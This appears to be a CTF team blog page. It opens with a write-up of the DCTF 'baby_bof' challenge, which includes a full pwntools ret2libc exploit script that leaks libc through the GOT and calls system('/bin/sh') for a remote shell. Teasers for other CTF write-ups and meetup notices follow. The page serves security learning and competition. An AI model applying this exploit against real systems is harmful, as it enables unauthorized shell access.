We got a simple binary with output plz don't rop me and after our input plz don't rop me
Also we got a Dockerfile, which showed us the used image was Ubuntu:20.04
Overview
Based on the output, we know it was a rop challenge.
Also checksec baby_bof gave us.
Loading the binary into ghidra I can calculate the offset of the return address.
So I knew, that after writing 18 characters I could overwrite the return address and control the code flow.
First I tried if I could do a rop only with the binary, but neither Ropper nor RopGadget found enough gadgets.
So I had to use libc. For this I first needed to get the address where libc was loaded.
In order for this I leaked the address of got.fgets.
If I then substract the address of fgets in libc, I could get the base address of libc.
After the leak I would rerun the vulnerable function to make our next input.
Then I could use system and /bin/sh from libc to get a shell.
But somehow this did work on my local machine and not remote. Because I didn't see my error, I gave up and continued with other challenges.
Short before the end, I wanted to finish this challenge, so I gave it another try.
I thought, that maybe my local system had a different libc.
So I downloaded the root from Github.
From their I could extract the libc and loading them side by side showed me the offsets were wrong.
But even with this change it didn't work.
Because I thought it could still be some error with the offset, I tried to print /bin/sh with puts.
The printout was correctly and I successfully had a shell.
From their I could cat the flag and the challenge was solved.
I didn't understanding why it worked. Testing some bits showed, that their was some call needed before the system or it woudln't work.
I modified my script, to just include a ret-Gadget and my final exploit code was.
#!/usr/bin/env python3frompwnimport*context.arch='amd64'context.kernel='amd64'#context.log_level = "DEBUG"context.log_level="INFO"context.terminal=['xfce4-terminal','-x','sh','-c']vulnerable='./baby_bof'elf=ELF(vulnerable)libc=ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')libc2=ELF('./libc.so.6')#p = elf.process()#p=remote("dctf-chall-baby-bof.westeurope.azurecontainer.io",7481)p.readuntil('plz don\'t rop me')fgets_got=elf.symbols['got.fgets']fgets_libc=libc2.symbols['fgets']system_libc=libc2.symbols['system']sh_libc=next(libc2.search(b'/bin/sh'))ret=next(elf.search(asm('ret')))rop=ROP(elf)rop.puts(fgets_got)rop.call(elf.symbols['vuln'])p.sendline(b'\x41'*18+bytes(rop))p.recvuntil("i don't think this will work\n")fgets_address=p.recvuntil("\n")[:-1]fgets_address=u64(fgets_address+b'\x00'*(8-len(fgets_address)))libc_address=(fgets_address-fgets_libc)system_address=system_libc+libc_addresssh_address=sh_libc+libc_addresself.symbols['system']=system_addressp.readuntil('plz don\'t rop me')rop=ROP(elf)rop.system(sh_address)p.sendline(b'\x41'*18+p64(ret)+bytes(rop))p.recvuntil("i don't think this will work\n")p.interactive()
Description Don't fall in (rabbit) holes Preface We get a binary which just prints Decryption finished. Overview Using ghidra, we can analyse the binary. Inside the main of the binary we can see, that their is some binary content and multiple functions called with strncpy in between. undefined8 main(int argc,char **argv) { char *key_text; char *key_buffer; long Read More
Description Blaise's friends like triangles too! nc dctf-chall-bell.westeurope.azurecontainer.io 5311 Preface The function gives us a number and then waits for multiple inputs. Overview Loading the file into ghidra we can take a look at what happens. undefined8 main(void) { int iVar1; uint uVar2; time_t tVar3; tVar3 = time((time_t *)0x0); srand((uintRead More
Description This should take about 1337 seconds to solve. nc dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io 7480 Preface We get a simple binary, with simple input and output. Overview Looking at the binary in ghidra, I found these functions. void vuln(void) { char local_48 [60]; int local_c; puts("tell me a joke"); fgets(local_48,0x100,stdin); if (Read More
Description Read me to get the flag. nc dctf-chall-readme.westeurope.azurecontainer.io 7481 Preface We get a binary which asks for our name and then prints hello + input. But in order for the binary to run, a file flag.txt needs to be created in the working directoy. Overview Decompiling the binary in ghidra, we see a function vuln where the logic happens. The decompiled function with some renaming of the variables looks like this: void vuln(void) { Read More
Description They say programmers' dream is California. And because they need somewhere to stay, we've built a hotel! nc dctf1-chall-hotel-rop.westeurope.azurecontainer.io 7480 Preface We got a binary file with simple input and some output related to hotel checkIn. Overview Based on the name of the challenge, we can be certain, that some sort of rop is needed. Loading the binary into ghidra we can see our function vuln. void vuln(void) { char local_28 [Read More
Description This should be easy! nc dctf1-chall-pinch-me.westeurope.azurecontainer.io 7480 Preface We got a binary file which asked us Am I dreaming? and with basic input prints then Pinch me! Overview Loading the binary into ghidra we can see, that the interaction happens in the function vuln void vuln(void) { char local_28 [24]; int local_10; int local_c; local_c = 0x1234567Read More
XSS, CSP bypass, Character Encoding Issues, Unintended Vulnerability
Overview What's your IKEA name? Mine is SORPOÄNGEN. http://ikea-name-generator.chal.perfect.blue/ By: corb3nik One of the most useful applications seen on a CTF so far, a name generator to dive into the Swedish culture: a must have for all the people shopping at IKEA like lavish today, see below. The application provides an input field where users are supposed to insert their name. After clicking on the submit button, an Ikea-like name is displayed. The report page allows...
Solve a Memory Maze by leaking info on mapped memory from /proc/self/map_files
Overview The challenge description goes as follows: Miscellaneous, 287 pts Difficulty: medium (26 solvers) Can you escape my memory maze? Treasure awaits at the end! nc memorymaze.hackable.software 1337 Download File Download archive here Well, let's see if we are able to find the treasure! A look at the...
Overview Featuring custom heap management, this Pwn challenge lets us embark on a quest to hack into a CLI theme park designer to free the alligator Lil Chompys from the clutches of BSides Orlando. We are given the binary together with its c source code, containing the application as well as a custom heap implementation. A theme park planner First off, the program presents us with a password check. Looking at the source code reveals... int mainRead More
Task Another telecom provider. Hope these guys prepared well enough for the network load... netcorp.q.2020.volgactf.ru Analysis The website is just a plain static site without any interesting content. The only action that you can do is click on the Complaint button, but that leads just to a 404 error page. Using a directory fuzzing tool to check if there is anything of interest not linked to be found, we stumble upon the /docs/ path. It contains a standard public documentation...
Overview scavengepad was a ASP .NET Core 2.2 web service, using Entity Framework Core with PostgreSQL for data storage and a Redis instance for session storage. It allows its users to create shared operations and objectives, collaboratively edit associated markdown documents and upload files. 1st vuln: RNG thread-safety (saarsec) Members of the saarsec CTF team have written an excellent writeup of the service and the vulnerability they found – a problem...
About Household is a website which manages cooking recipes. A user can register for an account, either as a cook or as a customer. A cook can: Add products Import prodcuts Add a dish containing a recipe Add a menu Most of that information entered can also be viewed on the website, but sometimes the site just asks to user to call the API instead. User registration and login is done with OpenID Connect (OIDC). The website uses cookies for authorization, the API a...
SSI injection, connect back to local MySQL, second order blind SQLi
Description We are TreesForFuture. We actively work towards getting more trees onto this planet. Recently we hired a contractor to create a website for us. While we still need to fill it with content in some places, you can already look at it http://31.22.123.49:1908. Preface Having scored the first blood and with only 2 teams solving the challenge, I thought it was almost mandatory to publish a write-up. I have to say that I really liked it,...
Overview gabbr is an online chatroom service. Upon loading the page, one joins a chatroom specified in the anchor part of the URL e.g. https://gabbr.hitme.tasteless.eu/#8f332afe-8f1d-411f-80f3-44bb2302405d. If no name is specified, a random UUID is generated upon join. The main functionality is to send messages in the chatroom. Furthermore, one can change the username to another randomly generated one, join a new random chatroom and report the chatroom to an admin. Upon reporting an admin joins the...
Challenge Description "Your Car broke down?! Come to our shop, we repair all cars! Even very old ones." Enter the Shop Analysis After accessing the URL of the challenge description the following page showed up: Here we can see several buttons which will execute certain functions when clicked. Below there is a message box which gets updated after some function was executed. At the bottom there was another button named Get your cookie! which lead to...
Where: @SBA Research (Floragasse 7, 1040 Wien, 5th Floor) When: Monday, 05.08.2018, 18:30 (CEST) What: Plans for upcoming CTFs Reviewing challenges of past CTFs $YOUR_TOPIC_HERE$ and of course Socializing ;)...
We participated in the iCTF 2019 and finished 2nd.
Last Friday we took part in this year's iCTF. The theme was "Race Condition", and like last year, the competition was open to everyone and hosted racing cars, err, vulnbox VMs were provided in the cloud 🌩️. New this year was a combination of Jeopardy challenges and classic Attack/Defense gameplay, "Jeopardy Defense" so to speak. The Jeopardy challenges were demanding by themselves (TI-83+ assembly, anyone?) and could be used to unlock functionality in the AD...
This time we don't have anything planned in particular, but if you're curious about CTFs you can just come and hang out with us. We might work on some OverTheWire Advent Calendar challenges as well. Where: @FH4, TU Wien (Wiedner Hauptstraße 8-10, 1040 Wien, Yellow Area) When: Thursday, 06.12.2018, 18:30 (CET) What: Nothing planned in particular Casual CTF discussion/challenge solving...
With this meetup we'll give another angr introduction, presenting the tutorial here. This introduction makes it a lot easier to solve the ragequit lab challenge and we will also be answering questions about said challenge. Where: @FH4, TU Wien (Wiedner Hauptstraße 8-10, 1040 Wien, Yellow Area) When: Thursday, 29.11.2018, 18:30 (CET) What: angr Introduction Q&A and Hints about the Lab Challenge...
Back on track after RuCTF, and we'll start with an overview of the AVR architecture, which is relevant for the current lab exercise of Advanced Internet Security. We'll also show how the gnuradio challenge can be solved without actually using gnuradio and afterwards we're gonna pick one CTF challenge and work on it. Where: @FH4, TU Wien (Wiedner Hauptstraße 8-10, 1040 Wien, Yellow Area) When: Thursday, 15.11.2018, 18:30 (CET) What: AVR Architecture Overview Working on the signal.dump without gnuradio Reviewing/Working on...
Today we'll be giving a walkthrough of the first lab challenge of Advanced Internet Security, botnet-takedown, and we're gonna talk about the (Russian) elephant in the room: RuCTF. The CTF will happen on Saturday and we'll meet up at 10:00 CET, let us know if you want to join in. Where: @FH4, TU Wien (Wiedner Hauptstraße 8-10, 1040 Wien, Yellow Area) When: Thursday, 08.11.2018, 18:30 (CET) What: botnet-takedown Walkthrough RuCTF: Gameplay and Infrastructure...
General problem description We got a 9 hours long video captured with a webcam on the top of a tall building in Tokyo(?). Find the flag. Solution First our guess was, that there will be a single frame which shows the flag, but fast-forwarding the video did not reveal anything like that. The next idea was to export every frame and use fuzzy hashing to find very different frames. While the script was doing the exporting we were fast-forwarding the...
General problem description We were given a arm64 ELF-Binary which was accessing a special device named xorshift64. The flag and some additional random values were hard-coded into the elf. Solution The ELF does more-or-less the same as this pseudocode: # init device #with open('/dev/xorshift64', 'r') as d: d.write(0x139408fcbbf7a44) # decode flag with open('/dev/xorshift64', 'r') as d: for i Read More
General problem description Given was a Windows binary, which was apparently waiting to be started with the correct cmd arguments. Solution The binary checked character by character the cmd arguments with a hard-coded value which was: "C:\\Temp\\SECCON2018Online.exe" SECCON{Runn1n6_P47h} The flag was: SECCON{Runn1n6_P47h}...
General problem description We were given a moxie ELF-Binary which was implementing the xorshift32 PRNG algorithm. The flag and some additional random values were hard-coded into the elf. Solution Similar to the Special device file challenge the binary took the flag xored with a random value hard-coded into to binary and xored again with a value taken from the xorshift32 algorithm. The catch was again, that we didn't know the correct configuration of the algorithm only the seed and...
General problem description Similar to the previous challenge we got two images (see below) and a pcap. Solution Like before we use the found wireshark dissector to see what happens. However this time we find way more relevant packages than before. After some filtering we identified, that the base station sends only four different commands: OUTPUT_TIME_SPEED: go in a direction with a constant speed for given time OUTPUT_STEP_SYNC: turn given "ticks" long OUTPUT_STEP_SPEED: go in...
General problem description For this challenge we got a picture of a Lego Mindstorm EV3, which displays the flag partly (see below). And we also got a pcap (OK, it was in the apple PackageLogger format) with captured Bluetooth transmission. Solution The pcap shows Bluetooth traffic, and wireshark finds furthermore identifies RFCOMM protocol. Some of them includes additional data parts. If you dig around long enough on the internet you can find a wireshark dissector written...
Description I heard Rust is a safe programming language. So I built this CodePad where you can compile and run safe Rust code. Initial Situation We had access to a web-terminal with a limited set of commands: $ help help - print this help clear - clear screen ls - list files cat - print file content rusty - compile rusty code version - print version Calling ls reveals a Rust project file structure and a file called flag.txt: $...
Because we decided on the meetup date on relatively short notice, we'll give an overview of the tools we regularly use. If requested, we can go into detail into certain topics. Where: @FH4, TU Wien (Wiedner Hauptstraße 8-10, 1040 Wien, Yellow Area) When: Thursday, 18.10.2018, 18:30 (CEST) What: Tooling overview...
General problem description Win the game 1,000,000 times to get the flag. For this challenge we got an .apk file, which we should apperently run and win 1,000,000 times. We let the online Java-decompiler at http://www.javadecompilers.com/apk. Running the apk on an Android-Phone or emulator shows us the game: Tic Tac Toe. We also get a counter 0/1000000 on the bottom of the screen. Each win increases the counter by one. Naive approach by recompiling the app We...
General problem definition You stumbled upon someone's "JS Safe" on the web. It's a simple HTML file that can store secrets in the browser's localStorage. This means that you won't be able to extract any secret from it (the secrets are on the computer of the owner), but it looks like it was hand-crafted to work only with the password of the owner... The assignment was a Javascript file, which needs the Flag as input. Getting...
General problem description You won't find any assembly in this challenge, only C64 BASIC. Once you get the password, the flag is CTF{password}. P.S. The challenge has been tested on the VICE emulator. We got an old .prg file, which is a C64 program file. Parsing the file First we tried using parsers that exist in the wild, that would parse the file for us, but that proved to be not effective, as there were not many...
We've been collaborating with LosFuzzys (https://hack.more.systems) for Google CTF and managed to solve a few challenges. This meetup, we'll go over some of those challenges. Where: @EI3A, TU Wien (Gußhausstraße 25, 1040 Wien, 2nd Floor) When: Thursday, 28.06.2018, 17:30 (CEST) What: Google CTF Recap...
Wargames by the OverTheWire Community (http://overthewire.org/wargames/) are a set of challenges to practice basic security concepts. Where: @EI3A, TU Wien (Gußhausstraße 25, 1040 Wien, 2nd Floor) When: Thursday, 21.06.2018, 17:30 (CEST) What: Wargames...
This meetup we will cover a basic introduction to Frida (https://www.frida.re/), a cross-platform dynamic instrumentation toolkit, and give a practical example of a past CTF challenge. Where: @EI3A, TU Wien (Gußhausstraße 25, 1040 Wien, 2nd Floor) When: Thursday, 14.06.2018, 17:30 (CEST) What: Intro to Frida Practical Example Challenge Frida and Android...
As an introduction to the last internet security challenge, we will give a short overview to writing exploits with pwntools. Where: @EI3A, TU Wien (Gußhausstraße 25, 1040 Wien, 2nd Floor) When: Thursday, 07.06.2018, 17:30 (CEST) What: Intro to pwntools Exploit Writing...
Next week, we will participate in FAUST CTF, an online attack-defense CTF. We will meet up at SBA Research and participate together. If you are curious about participating, what CTFs are or what's special about attack-defense CTFs, we are hosting this preparation meetup as part of our weekly CTF/Security meetup series. If you can't make it to the meetup, but still want to participate in the CTF, please contact us. Where: @EI3A, TU Wien (Gußhausstraße 25, 1040...
Where: @SBA Research (Favoritenstrasse 16, 1040 Wien, 1st Floor) When: Monday, 09.04.2018, 18:30 (CEST) What: Recap of past CTFs/challenges $YOUR_TOPIC_HERE$ and of course Socializing ;)...
yacs is a tool to store and later retrieve text snippets. If you store program source code there, it can even compile it for you! So handy. Of course, everything is protected using state-of-the-art user authorization and password hashing. It's a big C++ compiled binary which uses a local SQLite database file for data storage. Here's a normal create/list paste workflow: ___...
We participated in the RuCTF Finals 2017 and finished 12th.
Last Sunday we had the pleasure to participate in the RuCTF Finals 2017 in Yekaterinburg, Russia. After a long day of attacking other teams and defending our own services we managed to secure the 12th place out of 23 active teams. The services we had to work on were really interesting and quite diverse. But a really nice touch to the game was the actual hardware separation of services. Instead of providing a virtual machine...
Where: @SBA Research (Favoritenstrasse 16, 1040 Wien, 1st Floor) When: Monday, 09.01.2017, 18:30 (CET) What: Recap of past CTFs/challenges What to change in 2017? $YOUR_TOPIC_HERE$ and of course Socializing ;)...
The description of the challenge was as follows: There has been some strange transactions on this blockchain! Let's do some research. After downloading and extracting the data (fbi300_64635d9aa64b20d0.7z) is was clear that we where looking at at a .bitcoin folder of a bitcoin-core client hat was started in regtest mode. As a first guess we used bitcoin-abe to read and analyze the blockchain. (https://github.com/bitcoin-abe/bitcoin-abe). Since bitcoin-abe looks out-of-the-box in the default bitcoin directory ($HOME/.bitcoin/blcoks/*) the only thing we...
The description of the challenge was as follows: In this challenge you are presented with a PCAP that comes from a network infected by a well known SCADA related APT Threat (hint: pay attention to potential C&C) Identify the Read More
We participated in the iCTF 2015 and finished 8th.
Last Friday we participated in this year's iCTF. For the first time the services were not written by the organizers, but each team had to provide a service themselves in order to participate. Although this meant that there were fewer teams this year, still 30 teams took up the challenge in total. The organizers also got some angry comments for this setup, and they liked one of them so much that their unofficial theme...
We participated in the hack.lu CTF and finished 45th.
The past two days we were busy hacking in the hack.lu CTF. The challenges by fluxfingers were superb as always, and we solved quite some of them. Kudos to the top three teams, what a photo finish! You can find the scoreboard here....
This semester, we are looking for fresh blood to expand our team. If you think you have what it takes to deal with the challenges of interactive hacking challenges, live trouble-shooting for flaky Internet connections, defending online services which you have never seen before and the forensics skills to pinpoint exploits in a gbit connection, drop us an email at iwant2pwn@w0y.at Please include which security courses you have completed so far at TU...
We have a new homepage. And yes, we are on Twitter, too ...
Since this week we now have a public website, which will be updated with news and writeups. We are now on Twitter too, which will be used for live coverage from actual contest. Next week is the hack.lu CTF, and we will participate....
In this years iCTF2014-2015, themed "hacking at scale", we reached the 3rd place out of more than 80 participating universities.
Last Friday we participated in the ictf2014 and reached the 3rd place out of more than 80 participating universities. This years theme was "hacking at scale" with 42 services to pwn, most of which had been reused from previous iCTF's. We constantly improved our score during the CTF until we were at the second place about one hour before the end with only Team Bushwhackers in front of us. However, SpamAndHex did an incredible finish,...